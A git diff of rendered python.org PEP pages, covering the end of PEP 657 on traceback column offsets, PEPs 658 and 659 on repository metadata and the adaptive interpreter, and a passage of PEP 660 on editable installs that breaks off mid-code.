We understand that the extra cost of this information may not be acceptable for +some users, so we propose an opt-out mechanism which will cause generated code +objects to not have the extra information while also allowing pyc files to not +include the extra information.

+
+
+

Specification

+

In order to have enough information to correctly resolve the location +within a given line where an error was raised, a map linking bytecode +instructions to column offsets (start and end offset) and end line numbers +is needed. This is similar in fashion to how line numbers are currently linked +to bytecode instructions.

+

The following changes will be performed as part of the implementation of +this PEP:

+
    +
  • The offset information will be exposed to Python via a new attribute in the +code object class called co_positions that will return a sequence of +four-element tuples containing the full location of every instruction +(including start line, end line, start column offset and end column offset) +or None if the code object was created without the offset information.
  • +
  • One new C-API function:
    int PyCode_Addr2Location(
    +    PyCodeObject *co, int addrq,
    +    int *start_line, int *start_column,
    +    int *end_line, int *end_column)
    +
    +
    +

    will be added so the end line, the start column offsets and the end column +offset can be obtained given the index of a bytecode instruction. This +function will set the values to 0 if the information is not available.

    +
  • +
+

The internal storage, compression and encoding of the information is left as an +implementation detail and can be changed at any point as long as the public API +remains unchanged.

+
+

Offset semantics

+

These offsets are propagated by the compiler from the ones currently stored in +all AST nodes. The output of the public APIs (co_positions and PyCode_Addr2Location) +that deal with these attributes uses 0-indexed offsets (just like the AST nodes), but the underlying +implementation is free to represent the actual data in whatever form is most efficient. +When the information is not available, co_positions() yields None and +PyCode_Addr2Location reports -1. The availability of the information depends +on whether the offsets fall within the representable range, as well as on the runtime flags of the +interpreter configuration.
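
+
A small usage sketch (Python 3.11+, where this is exposed as the
co_positions() method on code objects; elements of a tuple may be None when
the information is unavailable):

+
def f(x):
+    return x['a']['b']
+
+for start_line, end_line, start_col, end_col in f.__code__.co_positions():
+    print(start_line, end_line, start_col, end_col)
+
+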

+

The AST nodes use int types to store these values. The current implementation, however, +utilizes uint8_t types as an implementation detail to minimize storage impact. This decision +allows offsets to go from 0 to 255, while offsets bigger than these values will be treated as +missing (returning -1 from the PyCode_Addr2Location API and None from the co_positions() API).

+

As specified previously, the underlying storage of the offsets should be +considered an implementation detail, as the public APIs to obtain this values +will return either C int types or Python int objects, which allows to +implement better compression/encoding in the future if bigger ranges would need +to be supported. This PEP proposes to start with this simpler version and +defer improvements to future work.

+
+
+

Displaying tracebacks

+

When displaying tracebacks, the default exception hook will be modified to +query this information from the code objects and use it to display a sequence +of carets for every displayed line in the traceback if the information is +available. For instance:

+
  File "test.py", line 6, in lel
+    return 1 + foo(a,b,c=x['z']['x']['y']['z']['y'], d=e)
+                         ~~~~~~~~~~~~~~~~^^^^^
+TypeError: 'NoneType' object is not subscriptable
+
+
+

When displaying tracebacks, instruction offsets will be taken from the +traceback objects. This makes highlighting exceptions that are re-raised work +naturally without the need to store the new information in the stack. For +example, for this code:

+
def foo(x):
+    1 + 1/0 + 2
+
+def bar(x):
+    try:
+        1 + foo(x) + foo(x)
+    except Exception as e:
+        raise ValueError("oh no!") from e
+
+bar(bar(bar(2)))
+
+
+

The printed traceback would look like this:

+
Traceback (most recent call last):
+  File "test.py", line 6, in bar
+    1 + foo(x) + foo(x)
+        ^^^^^^
+  File "test.py", line 2, in foo
+    1 + 1/0 + 2
+        ~^~
+ZeroDivisionError: division by zero
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+  File "test.py", line 10, in <module>
+    bar(bar(bar(2)))
+            ^^^^^^
+  File "test.py", line 8, in bar
+    raise ValueError("oh no!") from e
+    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+ValueError: oh no!
+
+
+

While this code:

+
def foo(x):
+    1 + 1/0 + 2
+def bar(x):
+    try:
+        1 + foo(x) + foo(x)
+    except Exception:
+        raise
+bar(bar(bar(2)))
+
+
+

Will be displayed as:

+
Traceback (most recent call last):
+  File "test.py", line 10, in <module>
+    bar(bar(bar(2)))
+            ^^^^^^
+  File "test.py", line 6, in bar
+    1 + foo(x) + foo(x)
+        ^^^^^^
+  File "test.py", line 2, in foo
+    1 + 1/0 + 2
+        ~^~
+ZeroDivisionError: division by zero
+
+
+

Maintaining the current behavior, only a single line will be displayed +in tracebacks. For instructions that span multiple lines (the end offset +and the start offset belong to different lines), the end line number must +be inspected to know if the end offset applies to the same line as the +starting offset.

+
+
+

Opt-out mechanism

+

To offer an opt-out mechanism for those users who care about the storage and memory overhead, and to allow third party tools and other programs that currently parse tracebacks to catch up, the following methods will be provided to deactivate this feature (a short demonstration follows the list):

+
    +
  • A new environment variable: PYTHONNODEBUGRANGES.
  • +
• A new command line option: python -Xno_debug_ranges.
  • +
+
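As a short demonstration (a sketch assuming CPython 3.11+, where this feature landed), setting the environment variable before the interpreter starts makes co_positions() report None for the offsets instead of real values:

import os
import subprocess
import sys

code = "def f(): pass\nprint(list(f.__code__.co_positions()))"
# Run a child interpreter with the opt-out environment variable set.
env = dict(os.environ, PYTHONNODEBUGRANGES="1")
subprocess.run([sys.executable, "-c", code], env=env)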

If any of these methods are used, the Python compiler will not populate code objects with the new information (None will be used instead), and any unmarshalled code objects that contain the extra information will have it stripped away and replaced with None. Additionally, the traceback machinery will not show the extended location information even if the information is present. This method allows users to:

+
    +
  • Create smaller pyc files by using one of the two methods when said files +are created.
  • +
• Avoid loading the extra information from pyc files if those were created with the extra information in the first place.
  • +
  • Deactivate the extra information when displaying tracebacks (the caret characters +indicating the location of the error).
  • +
+

Doing this has a very small performance hit, as the interpreter state needs to be fetched when code objects are created to look up the configuration. Creating code objects is not a performance-sensitive operation, so this should not be a concern.

+
+
+
+

Backwards Compatibility

+

The change is fully backwards compatible.

+
+
+

Reference Implementation

+

A reference implementation can be found in the implementation fork.

+
+
+

Rejected Ideas

+
+

Use a single caret instead of a range

+

It has been proposed to use a single caret instead of highlighting the full +range when reporting errors as a way to simplify the feature. We have decided +to not go this route for the following reasons:

+
    +
• Deriving the location of the caret is not straightforward using the current layout of the AST. This is because the AST nodes only record the start and end line numbers, as well as the start and end column offsets. As the AST nodes do not preserve the original tokens (by design), deriving the exact location of some tokens is not possible without extra re-parsing. For instance, binary operators currently have nodes for the operands, but the type of the operator is stored in an enumeration, so its location cannot be derived from the node (this is just an example of how this problem manifests, and not the only one).
  • +
• Deriving the ranges from AST nodes greatly simplifies the implementation and greatly reduces the maintenance cost and the possibility of errors. This is because using the ranges can always be done generically for any AST node, while any other custom information would need to be extracted differently from different types of nodes. Given how error-prone getting the locations manually was when generating the AST used to be a manual process, we believe that a generic solution is a very important property to pursue.
  • +
• Storing the information to highlight a single caret would be very limiting for tools such as coverage tools and profilers, as well as for tools like IPython and IDEs that want to make use of this new feature. As this message from the author of “friendly-traceback” mentions, without the full range (including end lines) these tools will find it very difficult to correctly highlight the relevant source code. For instance, for this code:
    something = foo(a,b,c) if bar(a,b,c) else other(b,c,d)
    +
    +
    +

tools (such as coverage reporters) want to be able to highlight the totality of the call that is covered by the executed bytecode (say, foo(a,b,c)) and not just a single character. Even if it is technically possible to re-parse and re-tokenize the source code to reconstruct the information, it is not possible to do this reliably, and it would result in a much worse user experience.

    +
  • +
• Many users have reported that a single caret is much harder to read than a full range, and this motivated using ranges to highlight syntax errors, which was very well received. Additionally, it has been noted that users with vision problems can identify the ranges much more easily than a single caret character, which we believe is a great advantage of using ranges.
  • +
+
+
+

Have a configure flag to opt out

+

Having a configure flag to opt out of the overhead even when executing Python in non-optimized mode may sound desirable, but it may cause problems when reading pyc files that were created with a version of the interpreter that was not compiled with the flag activated. This can lead to crashes that would be very difficult to debug for regular users and would make different pyc files incompatible with each other. As these pyc files could be shipped as part of libraries or applications without the original source, it is also not always possible to force recompilation of said pyc files. For these reasons we have decided to offer the opt-out as a runtime mechanism (the environment variable and command line option described above) rather than a build-time flag.

+
+
+

Lazy loading of column information

+

One potential solution to reduce the memory usage of this feature is to not load the column information from the pyc file when code is imported. Only if an uncaught exception bubbles up, or if a call to the C-API functions is made, would the column information be loaded from the pyc file. This is similar to how we only read source lines to display them in the traceback when an exception bubbles up. While this would indeed lower memory usage, it also results in a far more complex implementation requiring changes to the importing machinery to selectively ignore a part of the code object. We consider this an interesting avenue to explore, but ultimately we think it is out of scope for this particular PEP. It also means that column information would not be available if the user is not using pyc files, or for code objects created dynamically at runtime.

+
+
+

Implement compression

+

Although it would be possible to implement some form of compression over the +pyc files and the new data in code objects, we believe that this is out of the +scope of this proposal due to its larger impact (in the case of pyc files) and +the fact that we expect column offsets to not compress well due to the lack of +patterns in them (in case of the new data in code objects).

+
+
+
+

Acknowledgments

+

Thanks to Carl Friedrich Bolz-Tereick for showing an initial prototype of this idea for the PyPy interpreter, and for the helpful discussion.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0657.rst

+

Last modified: 2024-02-24 02:21:19 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0658/index.html b/pep-0658/index.html
new file mode 100644
index 00000000000..f2ee74bc03a
--- /dev/null
+++ b/pep-0658/index.html
@@ -0,0 +1,293 @@
+PEP 658 – Serve Distribution Metadata in the Simple Repository API | peps.python.org
+
+


+ + +
+
+
+

PEP 658 – Serve Distribution Metadata in the Simple Repository API

+
+
Author:
+
Tzu-ping Chung <uranusjr at gmail.com>
+
Sponsor:
+
Brett Cannon <brett at python.org>
+
PEP-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
10-May-2021
+
Post-History:
+
10-May-2021
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Abstract

+

This PEP proposes adding an anchor tag to expose the METADATA file +from distributions in the PEP 503 “simple” repository API. A +data-dist-info-metadata attribute is introduced to indicate that +the file from a given distribution can be independently fetched.

+
+
+

Motivation

+

Package management workflows made popular by recent tooling increase the need to inspect distribution metadata without intending to install the distribution, and to download multiple distributions of a project in order to choose among them based on their metadata. This means tools end up discarding much downloaded data, which is inefficient and results in a bad user experience.

+
+
+

Rationale

+

Tools have been exploring methods to reduce the download size by +partially downloading wheels with HTTP range requests. This, however, +adds additional run-time requirements to the repository server. It +also still adds additional overhead, since a separate request is +needed to fetch the wheel’s file listing to find the correct offset to +fetch the metadata file. It is therefore desired to make the server +extract the metadata file in advance, and serve it as an independent +file to avoid the need to perform additional requests and ZIP +inspection.

+

The metadata file defined by the Core Metadata Specification +[core-metadata] will be served directly by repositories since it +contains the necessary information for common use cases. The metadata +must only be served for standards-compliant distributions such as +wheels [wheel] and sdists [sdist], and must be identical to the +distribution’s canonical metadata file, such as a wheel’s METADATA +file in the .dist-info directory [dist-info].

+

An HTML attribute on the distribution file’s anchor link is needed to +indicate whether a client is able to choose the separately served +metadata file. The attribute is also used to provide the metadata +content’s hash for client-side verification. The attribute’s absence +indicates that a separate metadata entry is not available for the +distribution, either because of the distribution’s content, or lack of +repository support.

+
+
+

Specification

+

In a simple repository’s project page, each anchor tag pointing to a +distribution MAY have a data-dist-info-metadata attribute. The +presence of the attribute indicates the distribution represented by +the anchor tag MUST contain a Core Metadata file that will not be +modified when the distribution is processed and/or installed.

+

If a data-dist-info-metadata attribute is present, the repository +MUST serve the distribution’s Core Metadata file alongside the +distribution with a .metadata appended to the distribution’s file +name. For example, the Core Metadata of a distribution served at +/files/distribution-1.0-py3.none.any.whl would be located at +/files/distribution-1.0-py3.none.any.whl.metadata. This is similar +to how PEP 503 specifies the GPG signature file’s location.

+

The repository SHOULD provide the hash of the Core Metadata file +as the data-dist-info-metadata attribute’s value using the syntax +<hashname>=<hashvalue>, where <hashname> is the lower cased +name of the hash function used, and <hashvalue> is the hex encoded +digest. The repository MAY use true as the attribute’s value +if a hash is unavailable.

+
+
+

Backwards Compatibility

+

If an anchor tag lacks the data-dist-info-metadata attribute, +tools are expected to revert to their current behaviour of downloading +the distribution to inspect the metadata.

+

Older tools not supporting the new data-dist-info-metadata +attribute are expected to ignore the attribute and maintain their +current behaviour of downloading the distribution to inspect the +metadata. This is similar to how prior data- attribute additions +expect existing tools to operate.

+
+
+

Rejected Ideas

+
+

Put metadata content on the project page

+

Since tools generally only need dependency information from a +distribution in addition to what’s already available on the project +page, it was proposed that repositories may directly include the +information on the project page, like the data-requires-python +attribute specified in PEP 503.

+

This approach was abandoned since a distribution may contain +arbitrarily long lists of dependencies (including required and +optional), and it is unclear whether including the information for +every distribution in a project would result in net savings since the +information for most distributions generally ends up unneeded. By +serving the metadata separately, performance can be better estimated +since data usage will be more proportional to the number of +distributions inspected.

+
+
+

Expose more files in the distribution

+

It was proposed to provide the entire .dist-info directory as a +separate part, instead of only the metadata file. However, serving +multiple files in one entity through HTTP requires re-archiving them +separately after they are extracted from the original distribution +by the repository server, and there are no current use cases for files +other than METADATA when the distribution itself is not going to +be installed.

+

It should also be noted that the approach taken here does not +preclude other files from being introduced in the future, whether we +want to serve them together or individually.

+
+
+

Explicitly specify the metadata file’s URL on the project page

+

An early version of this draft proposed putting the metadata file’s +URL in the data-dist-info-metadata attribute. But people feel it +is better for discoverability to require the repository to serve the +metadata file at a determined location instead. The current approach +also has an additional benefit of making the project page smaller.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0658.rst

+

Last modified: 2023-10-13 05:15:59 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0659/index.html b/pep-0659/index.html
new file mode 100644
index 00000000000..01ddbfc929b
--- /dev/null
+++ b/pep-0659/index.html
@@ -0,0 +1,542 @@
+PEP 659 – Specializing Adaptive Interpreter | peps.python.org
+
+


+ + +
+
+
+

PEP 659 – Specializing Adaptive Interpreter

+
+
Author:
+
Mark Shannon <mark at hotpy.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
13-Apr-2021
+
Post-History:
+
11-May-2021
+
+
+
+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Specializing Adaptive Interpreter.

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

In order to perform well, virtual machines for dynamic languages must +specialize the code that they execute to the types and values in the +program being run. This specialization is often associated with “JIT” +compilers, but is beneficial even without machine code generation.

+

A specializing, adaptive interpreter is one that speculatively specializes +on the types or values it is currently operating on, and adapts to changes +in those types and values.

+

Specialization gives us improved performance, and adaptation allows the +interpreter to rapidly change when the pattern of usage in a program alters, +limiting the amount of additional work caused by mis-specialization.

+

This PEP proposes using a specializing, adaptive interpreter that specializes +code aggressively, but over a very small region, and is able to adjust to +mis-specialization rapidly and at low cost.

+

Adding a specializing, adaptive interpreter to CPython will bring significant +performance improvements. It is hard to come up with meaningful numbers, +as it depends very much on the benchmarks and on work that has not yet happened. +Extensive experimentation suggests speedups of up to 50%. +Even if the speedup were only 25%, this would still be a worthwhile enhancement.

+
+
+

Motivation

+

Python is widely acknowledged as slow. Whilst Python will never attain the performance of low-level languages like C, Fortran, or even Java, we would like it to be competitive with fast implementations of scripting languages, like V8 for JavaScript or LuaJIT for Lua. Specifically, we want to achieve these performance goals with CPython to benefit all users of Python, including those unable to use PyPy or other alternative virtual machines.

+

Achieving these performance goals is a long way off, and will require a lot of +engineering effort, but we can make a significant step towards those goals by +speeding up the interpreter. +Both academic research and practical implementations have shown that a fast +interpreter is a key part of a fast virtual machine.

+

Typical optimizations for virtual machines are expensive, so a long “warm up” +time is required to gain confidence that the cost of optimization is justified. +In order to get speed-ups rapidly, without noticeable warmup times, +the VM should speculate that specialization is justified even after a few +executions of a function. To do that effectively, the interpreter must be able +to optimize and de-optimize continually and very cheaply.

+

By using adaptive and speculative specialization at the granularity of +individual virtual machine instructions, +we get a faster interpreter that also generates profiling information +for more sophisticated optimizations in the future.

+
+
+

Rationale

+

There are many practical ways to speed-up a virtual machine for a dynamic +language. +However, specialization is the most important, both in itself and as an +enabler of other optimizations. +Therefore it makes sense to focus our efforts on specialization first, +if we want to improve the performance of CPython.

+

Specialization is typically done in the context of a JIT compiler, +but research shows specialization in an interpreter can boost performance +significantly, even outperforming a naive compiler [1].

+

There have been several ways of doing this proposed in the academic +literature, but most attempt to optimize regions larger than a +single bytecode [1] [2]. +Using larger regions than a single instruction requires code to handle +de-optimization in the middle of a region. +Specialization at the level of individual bytecodes makes de-optimization +trivial, as it cannot occur in the middle of a region.

+

By speculatively specializing individual bytecodes, we can gain significant +performance improvements without anything but the most local, +and trivial to implement, de-optimizations.

+

The closest approach to this PEP in the literature is +“Inline Caching meets Quickening” [3]. +This PEP has the advantages of inline caching, +but adds the ability to quickly de-optimize making the performance +more robust in cases where specialization fails or is not stable.

+
+

Performance

+

The speedup from specialization is hard to determine, as many specializations +depend on other optimizations. Speedups seem to be in the range 10% - 60%.

+
    +
  • Most of the speedup comes directly from specialization. The largest +contributors are speedups to attribute lookup, global variables, and calls.
  • +
  • A small, but useful, fraction is from improved dispatch such as +super-instructions and other optimizations enabled by quickening.
  • +
+
+
+
+

Implementation

+
+

Overview

+

Any instruction that would benefit from specialization will be replaced by an +“adaptive” form of that instruction. When executed, the adaptive instructions +will specialize themselves in response to the types and values that they see. +This process is known as “quickening”.

+

Once an instruction in a code object has executed enough times, +that instruction will be “specialized” by replacing it with a new instruction +that is expected to execute faster for that operation.

+
+
+

Quickening

+

Quickening is the process of replacing slow instructions with faster variants.

+

Quickened code has a number of advantages over immutable bytecode:

+
    +
  • It can be changed at runtime.
  • +
  • It can use super-instructions that span lines and take multiple operands.
  • +
  • It does not need to handle tracing as it can fallback to the original +bytecode for that.
  • +
+

In order that tracing can be supported, the quickened instruction format +should match the immutable, user visible, bytecode format: +16-bit instructions of 8-bit opcode followed by 8-bit operand.

+
+
+

Adaptive instructions

+

Each instruction that would benefit from specialization is replaced by an +adaptive version during quickening. For example, +the LOAD_ATTR instruction would be replaced with LOAD_ATTR_ADAPTIVE.

+

Each adaptive instruction periodically attempts to specialize itself.

+
+
+

Specialization

+

CPython bytecode contains many instructions that represent high-level +operations, and would benefit from specialization. Examples include CALL, +LOAD_ATTR, LOAD_GLOBAL and BINARY_ADD.

+

Introducing a “family” of specialized instructions for each of these instructions allows effective specialization, since each new instruction is specialized to a single task. Each family will include an “adaptive” instruction, that maintains a counter and attempts to specialize itself when that counter reaches zero.

+

Each family will also include one or more specialized instructions that +perform the equivalent of the generic operation much faster provided their +inputs are as expected. +Each specialized instruction will maintain a saturating counter which will +be incremented whenever the inputs are as expected. Should the inputs not +be as expected, the counter will be decremented and the generic operation +will be performed. +If the counter reaches the minimum value, the instruction is de-optimized by +simply replacing its opcode with the adaptive version.

+
+
+

Ancillary data

+

Most families of specialized instructions will require more information than can fit in an 8-bit operand. To achieve this, a number of 16-bit entries immediately following the instruction are used to store this data. This is a form of inline cache, an “inline data cache”. Unspecialized, or adaptive, instructions will use the first entry of this cache as a counter, and simply skip over the others.

+
+
+

Example families of instructions

+
+

LOAD_ATTR

+

The LOAD_ATTR instruction loads the named attribute of the object on top of the stack, +then replaces the object on top of the stack with the attribute.

+

This is an obvious candidate for specialization. Attributes might belong to +a normal instance, a class, a module, or one of many other special cases.

+

LOAD_ATTR would initially be quickened to LOAD_ATTR_ADAPTIVE which +would track how often it is executed, and call the _Py_Specialize_LoadAttr +internal function when executed enough times, or jump to the original +LOAD_ATTR instruction to perform the load. When optimizing, the kind +of the attribute would be examined, and if a suitable specialized instruction +was found, it would replace LOAD_ATTR_ADAPTIVE in place.

+

Specialization for LOAD_ATTR might include:

+
    +
  • LOAD_ATTR_INSTANCE_VALUE A common case where the attribute is stored in +the object’s value array, and not shadowed by an overriding descriptor.
  • +
  • LOAD_ATTR_MODULE Load an attribute from a module.
  • +
  • LOAD_ATTR_SLOT Load an attribute from an object whose +class defines __slots__.
  • +
+

Note how this allows optimizations that complement other optimizations. +The LOAD_ATTR_INSTANCE_VALUE works well with the “lazy dictionary” used for +many objects.

+
+
+

LOAD_GLOBAL

+

The LOAD_GLOBAL instruction looks up a name in the global namespace and then, if not present in the global namespace, looks it up in the builtins namespace. In 3.9 the C code for LOAD_GLOBAL includes code to check whether the whole code object should be modified to add a cache, code to check whether the value is in the global or the builtins namespace, code to look up the value in a cache, and fallback code. This makes it complicated and bulky. It also performs many redundant operations even when supposedly optimized.

+

Using a family of instructions makes the code more maintainable and faster, +as each instruction only needs to handle one concern.

+

Specializations would include:

+
    +
  • LOAD_GLOBAL_ADAPTIVE would operate like LOAD_ATTR_ADAPTIVE above.
  • +
  • LOAD_GLOBAL_MODULE can be specialized for the case where the value is in +the globals namespace. After checking that the keys of the namespace have +not changed, it can load the value from the stored index.
  • +
  • LOAD_GLOBAL_BUILTIN can be specialized for the case where the value is +in the builtins namespace. It needs to check that the keys of the global +namespace have not been added to, and that the builtins namespace has not +changed. Note that we don’t care if the values of the global namespace +have changed, just the keys.
  • +
+

See [4] for a full implementation.

+
+

Note

+

This PEP outlines the mechanisms for managing specialization, and does not +specify the particular optimizations to be applied. +It is likely that details, or even the entire implementation, may change +as the code is further developed.

+
+
+
+
+
+

Compatibility

+

There will be no change to the language, library or API.

+

The only way that users will be able to detect the presence of the new +interpreter is through timing execution, the use of debugging tools, +or measuring memory use.

+
+
+

Costs

+
+

Memory use

+

An obvious concern with any scheme that performs any sort of caching is +“how much more memory does it use?”. +The short answer is “not that much”.

+
+

Comparing memory use to 3.10

+

CPython 3.10 used 2 bytes per instruction, until the execution count reached ~2000, when it allocated another byte per instruction and 32 bytes per instruction with a cache (LOAD_GLOBAL and LOAD_ATTR).

+

The following table shows the additional bytes per instruction to support the +3.10 opcache or the proposed adaptive interpreter, on a 64 bit machine.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Version        3.10 cold   3.10 hot   3.11
Specialised    0%          ~15%       ~25%
code           2           2          2
opcache_map    0           1          0
opcache/data   0           4.8        4
Total          2           7.8        6
+

3.10 cold is before the code has reached the ~2000 limit. +3.10 hot shows the cache use once the threshold is reached.

+

The relative memory use depends on how much code is “hot” enough to trigger creation of the cache in 3.10. The break-even point, where the memory used by 3.10 is the same as for 3.11, is ~70%.

+

It is also worth noting that the actual bytecode is only part of a code +object. Code objects also include names, constants and quite a lot of +debugging information.

+

In summary, for most applications where many of the functions are relatively +unused, 3.11 will consume more memory than 3.10, but not by much.

+
+
+
+
+

Security Implications

+

None

+
+
+

Rejected Ideas

+

By implementing a specializing adaptive interpreter with inline data caches, +we are implicitly rejecting many alternative ways to optimize CPython. +However, it is worth emphasizing that some ideas, such as just-in-time +compilation, have not been rejected, merely deferred.

+
+

Storing data caches before the bytecode.

+

An earlier implementation of this PEP for 3.11 alpha used a different caching +scheme as described below:

+
+
Quickened instructions will be stored in an array (it is neither necessary nor desirable to store them in a Python object) with the same format as the original bytecode. Ancillary data will be stored in a separate array.

Each instruction will use 0 or more data entries. +Each instruction within a family must have the same amount of data allocated, +although some instructions may not use all of it. +Instructions that cannot be specialized, e.g. POP_TOP, +do not need any entries. +Experiments show that 25% to 30% of instructions can be usefully specialized. +Different families will need different amounts of data, +but most need 2 entries (16 bytes on a 64 bit machine).

+

In order to support larger functions than 256 instructions, +we compute the offset of the first data entry for instructions +as (instruction offset)//2 + (quickened operand).

+

Compared to the opcache in Python 3.10, this design:

+
    +
  • is faster; it requires no memory reads to compute the offset. +3.10 requires two reads, which are dependent.
  • +
• uses much less memory, as the data can be different sizes for different instruction families, and doesn’t need an additional array of offsets.
• +
• can support much larger functions, up to about 5000 instructions per function. 3.10 can support about 1000.
  • +
+
+

We rejected this scheme as the inline cache approach is both faster +and simpler.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0659.rst

+

Last modified: 2024-10-29 10:45:35 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0660/index.html b/pep-0660/index.html
new file mode 100644
index 00000000000..83eb5e05c4a
--- /dev/null
+++ b/pep-0660/index.html
@@ -0,0 +1,434 @@
+PEP 660 – Editable installs for pyproject.toml based builds (wheel based) | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 660 – Editable installs for pyproject.toml based builds (wheel based)

+
+
Author:
+
Daniel Holth <dholth at gmail.com>, Stéphane Bidoul <stephane.bidoul at gmail.com>
+
Sponsor:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
30-Mar-2021
+
Post-History:
+

+
Resolution:
+
Discourse thread
+
+
+
+
+
+

Abstract

+

This document describes a PEP 517 style method for the installation of packages +in editable mode.

+
+
+

Motivation

+

Python programmers want to be able to develop packages without having to +install (i.e. copy) them into site-packages, for example, by working in a +checkout of the source repository.

+

While this can be done by adding the relevant source directories to +PYTHONPATH, setuptools provides the setup.py develop mechanism that +makes the process easier, and also installs dependencies and entry points such +as console scripts. pip exposes this mechanism via its pip install +--editable option.

+

The installation of projects in such a way that the python code being +imported remains in the source directory is known as the editable +installation mode.

+

Now that PEP 517 provides a mechanism to create alternatives to setuptools, and +decouple installation front ends from build backends, we need a new mechanism +to install packages in editable mode.

+
+
+

Rationale

+

PEP 517 deferred “Editable installs”, meaning non-setup.py +distributions lacked that feature. The only way to retain editable installs +for these distributions was to provide a compatible setup.py develop +implementation. By defining an editable hook other build frontends gain +parity with setup.py.

+
+
+

Terminology and goals

+

The editable installation mode implies that the source code of the project +being installed is available in a local directory.

+

Once the project is installed in editable mode, users expect that changes to +the project python code in the local source tree become effective without the +need of a new installation step.

+

Some kinds of changes, such as the addition or modification of entry points, or the addition of new dependencies, require a new installation step to become effective. These changes are typically made in build backend configuration files (such as pyproject.toml), so it is consistent with the general user expectation that python source code is imported from the source tree.

+

The modification of non-python source code, such as C extension modules, obviously requires a compilation and/or installation step to become effective. The exact steps to perform will remain specific to the build backend used.

+

When a project is installed in editable mode, users expect the installation to +behave identically as a regular installation. In particular the code must be +importable by other code, and metadata must be available to standard mechanisms +such as importlib.metadata.

+

Depending on the way build backends implement this specification, some minor +differences may be visible such as the presence of additional files that are in +the source tree and would not be part of a regular install. Build backends are +encouraged to document such potential differences.

+
+
+

The Mechanism

+

This PEP adds three optional hooks to the PEP 517 backend interface. These hooks +are used to build a wheel that, when installed, allows that distribution to be +imported from its source folder.

+
+

build_editable

+
def build_editable(wheel_directory, config_settings=None, metadata_directory=None):
+    ...
+
+
+

Must build a .whl file, and place it in the specified wheel_directory. +It must return the basename (not the full path) of the .whl file it creates, as +a unicode string.

+

May do an in-place build of the distribution as a side effect so that any +extension modules or other built artifacts are ready to be used.

+

The .whl file must comply with the Wheel binary file format specification (PEP 427). In particular it must contain a compliant .dist-info directory. Metadata must be identical to the one that would have been produced by build_wheel or prepare_metadata_for_build_wheel, except for Requires-Dist, which may differ slightly as explained below.

+

Build-backends must produce wheels that have the same dependencies +(Requires-Dist metadata) as wheels produced by the build_wheel hook, +with the exception that they can add dependencies necessary for their editable +mechanism to function at runtime (such as editables).

+

The filename for the “editable” wheel needs to be PEP 427 compliant too. It +does not need to use the same tags as build_wheel but it must be tagged as +compatible with the system.

+

If the build frontend has previously called prepare_metadata_for_build_editable +and depends on the wheel resulting from this call to have metadata +matching this earlier call, then it should provide the path to the created +.dist-info directory as the metadata_directory argument. If this +argument is provided, then build_editable MUST produce a wheel with identical +metadata. The directory passed in by the build frontend MUST be +identical to the directory created by prepare_metadata_for_build_editable, +including any unrecognized files it created.

+

An “editable” wheel uses the wheel format not for distribution but as ephemeral +communication between the build system and the front end. This avoids having +the build backend install anything directly. This wheel must not be exposed +to end users, nor cached, nor distributed.

+
+
+

get_requires_for_build_editable

+
def get_requires_for_build_editable(config_settings=None):
+    ...
+
+
+

This hook MUST return an additional list of strings containing PEP 508 +dependency specifications, above and beyond those specified in the +pyproject.toml file, to be installed when calling the +build_editable hooks.

+

If not defined, the default implementation is equivalent to return [].

+
+
+

prepare_metadata_for_build_editable

+
def prepare_metadata_for_build_editable(metadata_directory, config_settings=None):
+    ...
+
+
+

Must create a .dist-info directory containing wheel metadata +inside the specified metadata_directory (i.e., creates a directory +like {metadata_directory}/{package}-{version}.dist-info/). This +directory MUST be a valid .dist-info directory as defined in the +wheel specification, except that it need not contain RECORD or +signatures. The hook MAY also create other files inside this +directory, and a build frontend MUST preserve, but otherwise ignore, such files; +the intention +here is that in cases where the metadata depends on build-time +decisions, the build backend may need to record these decisions in +some convenient format for re-use by the actual wheel-building step.

+

This must return the basename (not the full path) of the .dist-info +directory it creates, as a unicode string.

+

If a build frontend needs this information and the method is +not defined, it should call build_editable and look at the resulting +metadata directly.

+
+
+

What to put in the wheel

+

Build backends must populate the generated wheel with files that when installed will result in an editable install. +Build backends may use different techniques to achieve the goals of an editable +install. This section provides examples and is not normative.

+
    +
• Build backends may choose to place a .pth file at the root of the .whl file, containing the root directory of the source tree. This approach is simple but not very precise, although it may be considered good enough (especially when using the src layout) and is similar to what setup.py develop currently does (a minimal sketch of this approach follows this list).
  • +
  • The editables library shows how to build proxy modules that +provide a high quality editable installation. It accepts a list of modules +to include, and hide. When imported, these proxy modules replace themselves +with the code from the source tree. Path-based methods make all scripts under +a path importable, often including the project’s own setup.py and other +scripts that would not be part of a normal installation. The proxy strategy +can achieve a higher level of fidelity than path-based methods.
  • +
• Symbolic links are another useful mechanism to realize editable installs. Since, at the time of this writing, the wheel specification does not support symbolic links, they are not directly usable to set up symbolic links in the target environment. It is however possible for the backend to create a symlink structure in some build directory of the source tree, and add that directory to the python path via a .pth file in the “editable” wheel. If some files linked in this manner depend on python implementation or version, ABI or platform, care must be taken to generate the link structure in different directories depending on compatibility tags, so the same project tree can be installed in editable mode in multiple environments.
  • +
+
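The following is a minimal sketch of the .pth technique from the first bullet (names are hypothetical, and the mandatory .dist-info metadata files are omitted for brevity):

import os
import zipfile

def build_pth_editable_wheel(wheel_path, project_name, src_dir):
    with zipfile.ZipFile(wheel_path, "w") as whl:
        # Installing this wheel places the .pth file in site-packages,
        # which adds src_dir to sys.path at interpreter startup.
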